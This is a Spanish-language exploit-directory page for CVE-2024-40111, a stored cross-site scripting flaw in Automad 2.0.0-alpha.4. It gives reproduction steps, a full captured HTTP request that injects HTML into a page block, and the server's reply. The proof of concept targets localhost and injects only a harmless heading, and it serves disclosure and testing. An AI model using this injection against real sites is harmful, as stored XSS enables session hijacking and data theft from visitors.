Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-40111-Exploit — Exploit para: CVE-2024-40111: Cross-Site Scripting (XSS) almacenado en Automad 2.0.0-alpha.4 | Kitploit
Herramientas/GitHubGitHub/theexploiters/cve-2024-40111-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubtheexploiters/cve-2024-40111-exploit

CVE-2024-40111-Exploit

Exploit para: CVE-2024-40111: Cross-Site Scripting (XSS) almacenado en Automad 2.0.0-alpha.4

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-40111: Cross-Site Scripting (XSS) Almacenado en Automad 2.0.0-alpha.4

Detalles del Exploit

  • Título del Exploit: Cross-Site Scripting (XSS) Almacenado en Automad 2.0.0-alpha.4
  • Fecha: 2024-06-20
  • Autor del Exploit: Jerry Thomas (w3bn00b3r)
  • Página del Proveedor: Automad
  • Enlace del Software: Repositorio de Automad en GitHub
  • Categoría: Aplicación Web [CMS de Archivos Planos]
  • Versión: 2.0.0-alpha.4
  • Probado en: Docker versión 26.1.4, Debian GNU/Linux 11 (bullseye)

Descripción

Se ha identificado una vulnerabilidad de cross-site scripting (XSS) persistente (almacenado) en Automad 2.0.0-alpha.4. Esta vulnerabilidad permite a los atacantes inyectar código JavaScript malicioso en el cuerpo de la plantilla, que se almacena dentro del CMS. El código inyectado se ejecuta en el navegador de cualquier usuario que visite la página afectada, lo que podría provocar el secuestro de sesiones, el robo de datos y otras actividades maliciosas.

Prueba de Concepto

Pasos para Reproducir

  1. Iniciar sesión: Inicie sesión como administrador y navegue hasta el endpoint http://localhost/dashboard/home.

  2. Editar la página de bienvenida: Edite la página de bienvenida predeterminada.

  3. Navegar a la pestaña de contenido: Vaya a http://localhost/dashboard/page?url=%2F&section=text y edite el bloque llamado Main.

  4. Inyectar el payload: Introduzca el siguiente payload XSS:

    root@kitploit:~

Solicitud

root@kitploit:~
POST /_api/page/data HTTP/1.1
Host: localhost
Content-Length: 1822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
Accept: */*
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2F&section=text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
Connection: close

------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__csrf__"

49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__json__"

{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--

Respuesta

root@kitploit:~
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 20 Jun 2024 19:17:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/8.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30

{"code":200,"time":1718911055}
  1. Desencadenar el XSS: El payload XSS se activa al visitar la página de inicio http://localhost/.

Contador de visitas del repositorio

Descargar herramienta